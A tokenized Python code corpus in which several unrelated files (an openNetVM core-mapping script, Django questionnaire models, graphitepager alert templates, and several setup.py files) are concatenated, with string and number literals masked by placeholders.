and_return ( builder ) <EOL> return HasOne ( builder , parent , '<STR_LIT>' , '<STR_LIT:id>' ) <EOL> class OrmHasOneModelStub ( Model ) : <EOL> pass </s>
<s> import sys <EOL> import argparse <EOL> ONVM_CONST_MGR_THRD = <NUM_LIT:3> <EOL> sockets = [ ] <EOL> cores = [ ] <EOL> core_map = { } <EOL> onvm_mgr_corelist = [ ] <EOL> onvm_nfs_corelist = [ ] <EOL> """<STR_LIT>""" <EOL> def dpdk_cpu_info ( ) : <EOL> global core_map <EOL> global cores <EOL> global core_map <EOL> fd = open ( "<STR_LIT>" ) <EOL> lines = fd . readlines ( ) <EOL> fd . close ( ) <EOL> core_details = [ ] <EOL> core_lines = { } <EOL> for line in lines : <EOL> if len ( line . strip ( ) ) != <NUM_LIT:0> : <EOL> name , value = line . split ( "<STR_LIT::>" , <NUM_LIT:1> ) <EOL> core_lines [ name . strip ( ) ] = value . strip ( ) <EOL> else : <EOL> core_details . append ( core_lines ) <EOL> core_lines = { } <EOL> for core in core_details : <EOL> for field in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if field not in core : <EOL> print "<STR_LIT>" % field <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> core [ field ] = int ( core [ field ] ) <EOL> if core [ "<STR_LIT>" ] not in cores : <EOL> cores . append ( core [ "<STR_LIT>" ] ) <EOL> if core [ "<STR_LIT>" ] not in sockets : <EOL> sockets . append ( core [ "<STR_LIT>" ] ) <EOL> key = ( core [ "<STR_LIT>" ] , core [ "<STR_LIT>" ] ) <EOL> if key not in core_map : <EOL> core_map [ key ] = [ ] <EOL> core_map [ key ] . append ( core [ "<STR_LIT>" ] ) <EOL> """<STR_LIT>""" <EOL> def dpdk_cpu_info_print ( ) : <EOL> global core_map <EOL> global cores <EOL> global core_map <EOL> max_processor_len = len ( str ( len ( cores ) * len ( sockets ) * <NUM_LIT:2> - <NUM_LIT:1> ) ) <EOL> max_core_map_len = max_processor_len * <NUM_LIT:2> + len ( '<STR_LIT>' ) + len ( '<STR_LIT>' ) <EOL> max_core_id_len = len ( str ( max ( cores ) ) ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" , cores <EOL> print "<STR_LIT>" , sockets <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT:U+0020>" . 
ljust ( max_core_id_len + len ( '<STR_LIT>' ) ) , <EOL> for s in sockets : <EOL> print "<STR_LIT>" % str ( s ) . ljust ( max_core_map_len - len ( '<STR_LIT>' ) ) , <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT:U+0020>" . ljust ( max_core_id_len + len ( '<STR_LIT>' ) ) , <EOL> for s in sockets : <EOL> print "<STR_LIT>" . ljust ( max_core_map_len ) , <EOL> print "<STR_LIT>" <EOL> for c in cores : <EOL> print "<STR_LIT>" % str ( c ) . ljust ( max_core_id_len ) , <EOL> for s in sockets : <EOL> print str ( core_map [ ( s , c ) ] ) . ljust ( max_core_map_len ) , <EOL> print "<STR_LIT:\n>" <EOL> """<STR_LIT>""" <EOL> def onvm_corelist ( ) : <EOL> global core_map <EOL> global cores <EOL> global core_map <EOL> global onvm_mgr_corelist <EOL> global onvm_nfs_corelist <EOL> mgr_core_index = <NUM_LIT:0> <EOL> nf_core_index = len ( cores ) - <NUM_LIT:1> <EOL> rem_cores = len ( cores ) <EOL> total_mgr_thread = ONVM_CONST_MGR_THRD <EOL> for i in range ( <NUM_LIT:0> , total_mgr_thread ) : <EOL> onvm_mgr_corelist . append ( core_map [ ( <NUM_LIT:0> , mgr_core_index ) ] ) <EOL> mgr_core_index += <NUM_LIT:1> <EOL> rem_cores -= <NUM_LIT:1> <EOL> while ( rem_cores > <NUM_LIT:0> ) : <EOL> if rem_cores >= <NUM_LIT:3> : <EOL> onvm_mgr_corelist . append ( core_map [ ( <NUM_LIT:0> , cores [ mgr_core_index ] ) ] ) <EOL> onvm_nfs_corelist . append ( core_map [ ( <NUM_LIT:0> , cores [ nf_core_index ] ) ] ) <EOL> onvm_nfs_corelist . append ( core_map [ ( <NUM_LIT:0> , cores [ nf_core_index - <NUM_LIT:1> ] ) ] ) <EOL> mgr_core_index += <NUM_LIT:1> <EOL> nf_core_index -= <NUM_LIT:2> <EOL> rem_cores -= <NUM_LIT:3> <EOL> elif rem_cores == <NUM_LIT:2> : <EOL> onvm_mgr_corelist . append ( core_map [ ( <NUM_LIT:0> , cores [ mgr_core_index ] ) ] ) <EOL> onvm_nfs_corelist . 
append ( core_map [ ( <NUM_LIT:0> , cores [ nf_core_index ] ) ] ) <EOL> mgr_core_index += <NUM_LIT:1> <EOL> nf_core_index -= <NUM_LIT:1> <EOL> rem_cores -= <NUM_LIT:2> <EOL> else : <EOL> break <EOL> """<STR_LIT>""" <EOL> def onvm_corelist_print ( ) : <EOL> global onvm_mgr_corelist <EOL> global onvm_nfs_corelist <EOL> onvm_print_header ( ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> mgr_corelist = "<STR_LIT>" <EOL> for c in onvm_mgr_corelist : <EOL> for i in c : <EOL> mgr_corelist += "<STR_LIT>" % ( i ) <EOL> print "<STR_LIT>" % ( mgr_corelist [ : len ( mgr_corelist ) - <NUM_LIT:1> ] ) <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" % ( len ( onvm_nfs_corelist ) ) <EOL> for i in range ( len ( onvm_nfs_corelist ) - <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:1> ) : <EOL> print "<STR_LIT>" % ( len ( onvm_nfs_corelist ) - <NUM_LIT:1> - i ) , <EOL> for c in onvm_nfs_corelist [ i ] : <EOL> print "<STR_LIT:%s>" % ( c ) <EOL> def onvm_print_header ( ) : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> """<STR_LIT>""" <EOL> def run ( ) : <EOL> if args . all : <EOL> dpdk_cpu_info ( ) <EOL> onvm_corelist ( ) <EOL> dpdk_cpu_info_print ( ) <EOL> onvm_corelist_print ( ) <EOL> elif args . onvm : <EOL> dpdk_cpu_info ( ) <EOL> onvm_corelist ( ) <EOL> onvm_corelist_print ( ) <EOL> elif args . cpu : <EOL> dpdk_cpu_info ( ) <EOL> dpdk_cpu_info_print ( ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> dpdk_cpu_info ( ) <EOL> onvm_corelist ( ) <EOL> onvm_corelist_print ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> parser = argparse . ArgumentParser ( description = '<STR_LIT>' ) <EOL> parser . 
add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT:-c>" , "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , <EOL> action = "<STR_LIT:store_true>" , <EOL> help = "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> run ( ) </s>
<s> from distutils . core import setup <EOL> from distutils . extension import Extension <EOL> try : <EOL> from Cython . Build import cythonize <EOL> import numpy <EOL> except ImportError : <EOL> print "<STR_LIT>" <EOL> import sys <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> setup ( <EOL> ext_modules = cythonize ( Extension ( <EOL> '<STR_LIT>' , <EOL> sources = [ <EOL> '<STR_LIT>' , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> include_dirs = [ <EOL> numpy . get_include ( ) , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> language = "<STR_LIT>" , <EOL> ) ) , <EOL> ) </s>
<s> cft = CloudFormationTemplate ( description = "<STR_LIT>" ) <EOL> user_data_script = '''<STR_LIT>''' <EOL> cft . resources . add ( Resource ( '<STR_LIT>' , '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : base64 ( user_data_script ) , <EOL> } ) <EOL> ) </s>
<s> from django . db import models <EOL> from transmeta import TransMeta <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from questionnaire import QuestionChoices <EOL> import re <EOL> from utils import split_numal <EOL> import json <EOL> from parsers import parse_checks , ParseException <EOL> from django . conf import settings <EOL> _numre = re . compile ( "<STR_LIT>" , re . I ) <EOL> class Subject ( models . Model ) : <EOL> STATE_CHOICES = [ <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ] <EOL> state = models . CharField ( max_length = <NUM_LIT:16> , default = "<STR_LIT>" , <EOL> choices = STATE_CHOICES , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> surname = models . CharField ( max_length = <NUM_LIT:64> , blank = True , null = True , <EOL> verbose_name = _ ( '<STR_LIT>' ) ) <EOL> givenname = models . CharField ( max_length = <NUM_LIT:64> , blank = True , null = True , <EOL> verbose_name = _ ( '<STR_LIT>' ) ) <EOL> email = models . EmailField ( null = True , blank = True , verbose_name = _ ( '<STR_LIT>' ) ) <EOL> gender = models . CharField ( max_length = <NUM_LIT:8> , default = "<STR_LIT>" , blank = True , <EOL> verbose_name = _ ( '<STR_LIT>' ) , <EOL> choices = ( ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) ) , <EOL> ) <EOL> ) <EOL> nextrun = models . DateField ( verbose_name = _ ( '<STR_LIT>' ) , blank = True , null = True ) <EOL> formtype = models . CharField ( max_length = <NUM_LIT:16> , default = '<STR_LIT:email>' , <EOL> verbose_name = _ ( '<STR_LIT>' ) , <EOL> choices = ( <EOL> ( "<STR_LIT:email>" , _ ( "<STR_LIT>" ) ) , <EOL> ( "<STR_LIT>" , _ ( "<STR_LIT>" ) , ) ) <EOL> ) <EOL> language = models . CharField ( max_length = <NUM_LIT:2> , default = settings . LANGUAGE_CODE , <EOL> verbose_name = _ ( '<STR_LIT>' ) , choices = settings . 
LANGUAGES ) <EOL> def __unicode__ ( self ) : <EOL> return u'<STR_LIT>' % ( self . surname , self . givenname , self . email ) <EOL> def next_runid ( self ) : <EOL> "<STR_LIT>" <EOL> return str ( self . nextrun . year ) <EOL> def last_run ( self ) : <EOL> "<STR_LIT>" <EOL> try : <EOL> query = RunInfoHistory . objects . filter ( subject = self ) <EOL> return query . order_by ( '<STR_LIT>' ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> return None <EOL> def history ( self ) : <EOL> return RunInfoHistory . objects . filter ( subject = self ) . order_by ( '<STR_LIT>' ) <EOL> def pending ( self ) : <EOL> return RunInfo . objects . filter ( subject = self ) . order_by ( '<STR_LIT>' ) <EOL> class Questionnaire ( models . Model ) : <EOL> name = models . CharField ( max_length = <NUM_LIT> ) <EOL> redirect_url = models . CharField ( max_length = <NUM_LIT> , help_text = "<STR_LIT>" , default = "<STR_LIT>" ) <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> def questionsets ( self ) : <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> self . __qscache = QuestionSet . objects . filter ( questionnaire = self ) . order_by ( '<STR_LIT>' ) <EOL> return self . __qscache <EOL> def questions ( self ) : <EOL> questions = [ ] <EOL> for questionset in self . questionsets ( ) : <EOL> questions += questionset . questions ( ) <EOL> return questions <EOL> class Meta : <EOL> permissions = ( <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> ) <EOL> class QuestionSet ( models . Model ) : <EOL> __metaclass__ = TransMeta <EOL> "<STR_LIT>" <EOL> questionnaire = models . ForeignKey ( Questionnaire ) <EOL> sortid = models . IntegerField ( ) <EOL> heading = models . CharField ( max_length = <NUM_LIT:64> ) <EOL> checks = models . CharField ( max_length = <NUM_LIT> , blank = True , <EOL> help_text = """<STR_LIT>""" ) <EOL> text = models . 
TextField ( u'<STR_LIT>' , help_text = "<STR_LIT>" ) <EOL> def questions ( self ) : <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> def numeric_number ( val ) : <EOL> matches = re . findall ( r'<STR_LIT>' , val ) <EOL> return int ( matches [ <NUM_LIT:0> ] ) if matches else <NUM_LIT:0> <EOL> self . __qcache = sorted ( Question . objects . filter ( questionset = self . id ) , key = lambda q : ( numeric_number ( q . number ) , q . number ) ) <EOL> return self . __qcache <EOL> def next ( self ) : <EOL> qs = self . questionnaire . questionsets ( ) <EOL> retnext = False <EOL> for q in qs : <EOL> if retnext : <EOL> return q <EOL> if q == self : <EOL> retnext = True <EOL> return None <EOL> def prev ( self ) : <EOL> qs = self . questionnaire . questionsets ( ) <EOL> last = None <EOL> for q in qs : <EOL> if q == self : <EOL> return last <EOL> last = q <EOL> def is_last ( self ) : <EOL> try : <EOL> return self . questionnaire . questionsets ( ) [ - <NUM_LIT:1> ] == self <EOL> except NameError : <EOL> return True <EOL> def is_first ( self ) : <EOL> try : <EOL> return self . questionnaire . questionsets ( ) [ <NUM_LIT:0> ] == self <EOL> except NameError : <EOL> return True <EOL> def __unicode__ ( self ) : <EOL> return u'<STR_LIT>' % ( self . questionnaire . name , self . heading ) <EOL> class Meta : <EOL> translate = ( '<STR_LIT:text>' , ) <EOL> class RunInfo ( models . Model ) : <EOL> "<STR_LIT>" <EOL> subject = models . ForeignKey ( Subject ) <EOL> random = models . CharField ( max_length = <NUM_LIT:32> ) <EOL> runid = models . CharField ( max_length = <NUM_LIT:32> ) <EOL> questionset = models . ForeignKey ( QuestionSet , blank = True , null = True ) <EOL> emailcount = models . IntegerField ( default = <NUM_LIT:0> ) <EOL> created = models . DateTimeField ( auto_now_add = True ) <EOL> emailsent = models . DateTimeField ( null = True , blank = True ) <EOL> lastemailerror = models . CharField ( max_length = <NUM_LIT:64> , null = True , blank = True ) <EOL> state = models . 
CharField ( max_length = <NUM_LIT:16> , null = True , blank = True ) <EOL> cookies = models . TextField ( null = True , blank = True ) <EOL> tags = models . TextField ( <EOL> blank = True , <EOL> help_text = u"<STR_LIT>" <EOL> ) <EOL> skipped = models . TextField ( <EOL> blank = True , <EOL> help_text = u"<STR_LIT>" <EOL> ) <EOL> def save ( self , ** kwargs ) : <EOL> self . random = ( self . random or '<STR_LIT>' ) . lower ( ) <EOL> super ( RunInfo , self ) . save ( ** kwargs ) <EOL> def add_tags ( self , tags ) : <EOL> for tag in tags : <EOL> if self . tags : <EOL> self . tags += '<STR_LIT:U+002C>' <EOL> self . tags += tag <EOL> def remove_tags ( self , tags ) : <EOL> if not self . tags : <EOL> return <EOL> current_tags = self . tags . split ( '<STR_LIT:U+002C>' ) <EOL> for tag in tags : <EOL> try : <EOL> current_tags . remove ( tag ) <EOL> except ValueError : <EOL> pass <EOL> self . tags = "<STR_LIT:U+002C>" . join ( current_tags ) <EOL> def set_cookie ( self , key , value ) : <EOL> "<STR_LIT>" <EOL> key = key . lower ( ) . strip ( ) <EOL> cookies = self . get_cookiedict ( ) <EOL> if type ( value ) not in ( int , float , str , unicode , type ( None ) ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if value is None : <EOL> if key in cookies : <EOL> del cookies [ key ] <EOL> else : <EOL> if type ( value ) in ( '<STR_LIT:int>' , '<STR_LIT:float>' ) : <EOL> value = str ( value ) <EOL> cookies [ key ] = value <EOL> cstr = json . dumps ( cookies ) <EOL> self . cookies = cstr <EOL> self . save ( ) <EOL> self . __cookiecache = cookies <EOL> def get_cookie ( self , key , default = None ) : <EOL> if not self . cookies : <EOL> return default <EOL> d = self . get_cookiedict ( ) <EOL> return d . get ( key . lower ( ) . strip ( ) , default ) <EOL> def get_cookiedict ( self ) : <EOL> if not self . cookies : <EOL> return { } <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . __cookiecache = json . loads ( self . cookies ) <EOL> return self . 
__cookiecache <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . runid , self . subject . surname , self . subject . givenname ) <EOL> class Meta : <EOL> verbose_name_plural = '<STR_LIT>' <EOL> class RunInfoHistory ( models . Model ) : <EOL> subject = models . ForeignKey ( Subject ) <EOL> runid = models . CharField ( max_length = <NUM_LIT:32> ) <EOL> completed = models . DateField ( ) <EOL> tags = models . TextField ( <EOL> blank = True , <EOL> help_text = u"<STR_LIT>" <EOL> ) <EOL> skipped = models . TextField ( <EOL> blank = True , <EOL> help_text = u"<STR_LIT>" <EOL> ) <EOL> questionnaire = models . ForeignKey ( Questionnaire ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . runid , self . subject , self . completed ) <EOL> def answers ( self ) : <EOL> "<STR_LIT>" <EOL> return Answer . objects . filter ( subject = self . subject , runid = self . runid ) <EOL> class Meta : <EOL> verbose_name_plural = '<STR_LIT>' <EOL> class Question ( models . Model ) : <EOL> __metaclass__ = TransMeta <EOL> questionset = models . ForeignKey ( QuestionSet ) <EOL> number = models . CharField ( max_length = <NUM_LIT:8> , help_text = <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> text = models . TextField ( blank = True , verbose_name = _ ( "<STR_LIT>" ) ) <EOL> type = models . CharField ( u"<STR_LIT>" , max_length = <NUM_LIT:32> , <EOL> choices = QuestionChoices , <EOL> help_text = u"<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" ) <EOL> extra = models . CharField ( u"<STR_LIT>" , max_length = <NUM_LIT> , blank = True , null = True , help_text = u"<STR_LIT>" ) <EOL> checks = models . CharField ( u"<STR_LIT>" , max_length = <NUM_LIT> , blank = True , <EOL> null = True , help_text = "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> '<STR_LIT>' ) <EOL> footer = models . 
TextField ( u"<STR_LIT>" , help_text = "<STR_LIT>" , blank = True ) <EOL> def questionnaire ( self ) : <EOL> return self . questionset . questionnaire <EOL> def getcheckdict ( self ) : <EOL> """<STR_LIT>""" <EOL> if ( hasattr ( self , '<STR_LIT>' ) ) : <EOL> return self . __checkdict_cached <EOL> try : <EOL> self . __checkdict_cached = d = parse_checks ( self . sameas ( ) . checks or '<STR_LIT>' ) <EOL> except ParseException : <EOL> raise Exception ( "<STR_LIT>" % ( <EOL> self . number , self . sameas ( ) . checks ) ) <EOL> return d <EOL> def __unicode__ ( self ) : <EOL> return u'<STR_LIT>' % ( unicode ( self . questionset ) , self . number , self . text ) <EOL> def sameas ( self ) : <EOL> if self . type == '<STR_LIT>' : <EOL> try : <EOL> kwargs = { } <EOL> for check , value in parse_checks ( self . checks ) : <EOL> if check == '<STR_LIT>' : <EOL> kwargs [ '<STR_LIT:id>' ] = value <EOL> break <EOL> elif check == '<STR_LIT>' : <EOL> kwargs [ '<STR_LIT>' ] = value <EOL> kwargs [ '<STR_LIT>' ] = self . questionset . questionnaire <EOL> break <EOL> self . __sameas = res = getattr ( self , "<STR_LIT>" , Question . objects . get ( ** kwargs ) ) <EOL> return res <EOL> except Question . DoesNotExist : <EOL> return Question ( type = '<STR_LIT>' ) <EOL> return self <EOL> def display_number ( self ) : <EOL> "<STR_LIT>" <EOL> m = _numre . match ( self . number ) <EOL> if m : <EOL> sub = m . group ( <NUM_LIT:2> ) <EOL> return "<STR_LIT>" + sub <EOL> return self . number <EOL> def choices ( self ) : <EOL> if self . type == '<STR_LIT>' : <EOL> return self . sameas ( ) . choices ( ) <EOL> res = Choice . objects . filter ( question = self ) . order_by ( '<STR_LIT>' ) <EOL> return res <EOL> def is_custom ( self ) : <EOL> return "<STR_LIT>" == self . sameas ( ) . type <EOL> def get_type ( self ) : <EOL> "<STR_LIT>" <EOL> t = self . sameas ( ) . type <EOL> if t == '<STR_LIT>' : <EOL> cd = self . sameas ( ) . 
getcheckdict ( ) <EOL> if '<STR_LIT:type>' not in cd : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> return cd . get ( '<STR_LIT:type>' ) <EOL> return t <EOL> def questioninclude ( self ) : <EOL> return "<STR_LIT>" + self . get_type ( ) + "<STR_LIT>" <EOL> class Meta : <EOL> translate = ( '<STR_LIT:text>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class Choice ( models . Model ) : <EOL> __metaclass__ = TransMeta <EOL> question = models . ForeignKey ( Question ) <EOL> sortid = models . IntegerField ( ) <EOL> value = models . CharField ( u"<STR_LIT>" , max_length = <NUM_LIT:64> ) <EOL> text = models . CharField ( u"<STR_LIT>" , max_length = <NUM_LIT:200> ) <EOL> tags = models . CharField ( u"<STR_LIT>" , max_length = <NUM_LIT:64> , blank = True ) <EOL> def __unicode__ ( self ) : <EOL> return u'<STR_LIT>' % ( self . question . number , self . sortid , self . text ) <EOL> class Meta : <EOL> translate = ( '<STR_LIT:text>' , ) <EOL> class Answer ( models . Model ) : <EOL> subject = models . ForeignKey ( Subject , help_text = u'<STR_LIT>' ) <EOL> question = models . ForeignKey ( Question , help_text = u"<STR_LIT>" ) <EOL> runid = models . CharField ( u'<STR_LIT>' , help_text = u"<STR_LIT>" , max_length = <NUM_LIT:32> ) <EOL> answer = models . TextField ( ) <EOL> def __unicode__ ( self ) : <EOL> return "<STR_LIT>" % ( self . question . number , self . subject . surname , self . subject . givenname ) <EOL> def split_answer ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return json . loads ( self . answer ) <EOL> except ValueError : <EOL> if '<STR_LIT>' in self . question . type : <EOL> return self . answer . split ( '<STR_LIT>' ) <EOL> else : <EOL> return [ self . answer ] <EOL> def check_answer ( self ) : <EOL> "<STR_LIT>" <EOL> return True <EOL> def save ( self , runinfo = None , ** kwargs ) : <EOL> self . _update_tags ( runinfo ) <EOL> super ( Answer , self ) . 
save ( ** kwargs ) <EOL> def _update_tags ( self , runinfo ) : <EOL> if not runinfo : <EOL> return <EOL> tags_to_add = [ ] <EOL> for choice in self . question . choices ( ) : <EOL> tags = choice . tags <EOL> if not tags : <EOL> continue <EOL> tags = tags . split ( '<STR_LIT:U+002C>' ) <EOL> runinfo . remove_tags ( tags ) <EOL> for split_answer in self . split_answer ( ) : <EOL> if unicode ( split_answer ) == choice . value : <EOL> tags_to_add . extend ( tags ) <EOL> runinfo . add_tags ( tags_to_add ) <EOL> runinfo . save ( ) </s>
<s> """<STR_LIT>""" <EOL> from businesstime import __version__ <EOL> try : <EOL> from setuptools import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = __version__ , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> url = '<STR_LIT>' , <EOL> license = open ( '<STR_LIT>' ) . read ( ) , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) + '<STR_LIT>' + <EOL> open ( '<STR_LIT>' ) . read ( ) , <EOL> tests_require = [ '<STR_LIT>' ] , <EOL> test_suite = '<STR_LIT>' <EOL> ) </s>
<s> from jinja2 import Template <EOL> from urllib import urlencode <EOL> from graphitepager . level import Level <EOL> ALERT_MISSING_TEMPLATE = r"""<STR_LIT>""" <EOL> HTML_ALERT_MISSING_TEMPLATE = r"""<STR_LIT>""" <EOL> SLACK_ALERT_MISSING_TEMPLATE = r"""<STR_LIT>""" <EOL> STDOUT_MISSING_TEMPLATE = r"""<STR_LIT>""" <EOL> ALERT_TEMPLATE = r"""<STR_LIT>""" <EOL> HTML_ALERT_TEMPLATE = r"""<STR_LIT>""" <EOL> SLACK_ALERT_TEMPLATE = r"""<STR_LIT>""" <EOL> STDOUT_TEMPLATE = r"""<STR_LIT>""" <EOL> class Description ( object ) : <EOL> def __init__ ( self , template , graphite_url , alert , record , level , value ) : <EOL> self . template = template <EOL> self . graphite_url = graphite_url <EOL> self . alert = alert <EOL> self . record = record <EOL> self . level = level <EOL> self . value = value <EOL> def __str__ ( self ) : <EOL> return self . description_for_alert ( <EOL> self . template , <EOL> self . graphite_url , <EOL> self . alert , <EOL> self . record , <EOL> self . level , <EOL> self . value , <EOL> ) <EOL> def stdout ( self ) : <EOL> template = STDOUT_TEMPLATE <EOL> if self . level == Level . NO_DATA : <EOL> template = STDOUT_MISSING_TEMPLATE <EOL> return self . description_for_alert ( <EOL> template , <EOL> self . graphite_url , <EOL> self . alert , <EOL> self . record , <EOL> self . level , <EOL> self . value , <EOL> ) <EOL> def html ( self ) : <EOL> template = HTML_ALERT_TEMPLATE <EOL> if self . level == Level . NO_DATA : <EOL> template = HTML_ALERT_MISSING_TEMPLATE <EOL> return self . description_for_alert ( <EOL> template , <EOL> self . graphite_url , <EOL> self . alert , <EOL> self . record , <EOL> self . level , <EOL> self . value , <EOL> ) <EOL> def slack ( self ) : <EOL> template = SLACK_ALERT_TEMPLATE <EOL> if self . level == Level . NO_DATA : <EOL> template = SLACK_ALERT_MISSING_TEMPLATE <EOL> return self . description_for_alert ( <EOL> template , <EOL> self . graphite_url , <EOL> self . alert , <EOL> self . record , <EOL> self . level , <EOL> self . 
value , <EOL> ) <EOL> def description_for_alert ( self , <EOL> template , <EOL> graphite_url , <EOL> alert , <EOL> record , <EOL> level , <EOL> current_value ) : <EOL> context = dict ( locals ( ) ) <EOL> context [ '<STR_LIT>' ] = graphite_url <EOL> if type ( record ) == str : <EOL> context [ '<STR_LIT>' ] = alert . documentation_url ( ) <EOL> else : <EOL> context [ '<STR_LIT>' ] = alert . documentation_url ( record . target ) <EOL> url_params = ( <EOL> ( '<STR_LIT:width>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT:target>' , alert . get ( '<STR_LIT:target>' ) ) , <EOL> ( '<STR_LIT:target>' , '<STR_LIT>' . format ( <EOL> alert . get ( '<STR_LIT>' ) ) ) , <EOL> ( '<STR_LIT:target>' , '<STR_LIT>' . format ( <EOL> alert . get ( '<STR_LIT>' ) ) ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> url_args = urlencode ( url_params ) <EOL> url = '<STR_LIT>' . format ( graphite_url , url_args ) <EOL> context [ '<STR_LIT>' ] = url . replace ( '<STR_LIT>' , '<STR_LIT:http>' ) <EOL> context [ '<STR_LIT>' ] = alert . value_for_level ( level ) <EOL> if level == Level . NOMINAL : <EOL> context [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> context [ '<STR_LIT>' ] = level <EOL> return Template ( template ) . 
render ( context ) <EOL> def _get_description ( graphite_url , <EOL> alert , <EOL> record , <EOL> alert_level , <EOL> value , <EOL> alert_template ) : <EOL> return Description ( <EOL> alert_template , <EOL> graphite_url , <EOL> alert , <EOL> record , <EOL> alert_level , <EOL> value <EOL> ) <EOL> def get_description ( graphite_url , <EOL> alert , <EOL> record , <EOL> alert_level , <EOL> value ) : <EOL> return _get_description ( graphite_url , <EOL> alert , <EOL> record , <EOL> alert_level , <EOL> value , <EOL> ALERT_TEMPLATE ) <EOL> def missing_target_description ( graphite_url , <EOL> alert , <EOL> record , <EOL> alert_level , <EOL> value ) : <EOL> return _get_description ( graphite_url , <EOL> alert , <EOL> record , <EOL> alert_level , <EOL> value , <EOL> ALERT_MISSING_TEMPLATE ) </s>
<s> from sixpack import __version__ <EOL> try : <EOL> from setuptools import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = __version__ , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> scripts = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> url = '<STR_LIT>' , <EOL> license = open ( '<STR_LIT>' ) . read ( ) , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> ] , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) + '<STR_LIT>' + <EOL> open ( '<STR_LIT>' ) . read ( ) , <EOL> tests_require = [ '<STR_LIT>' ] , <EOL> test_suite = '<STR_LIT>' , <EOL> install_requires = open ( '<STR_LIT>' ) . readlines ( ) , <EOL> include_package_data = True , <EOL> ) </s>
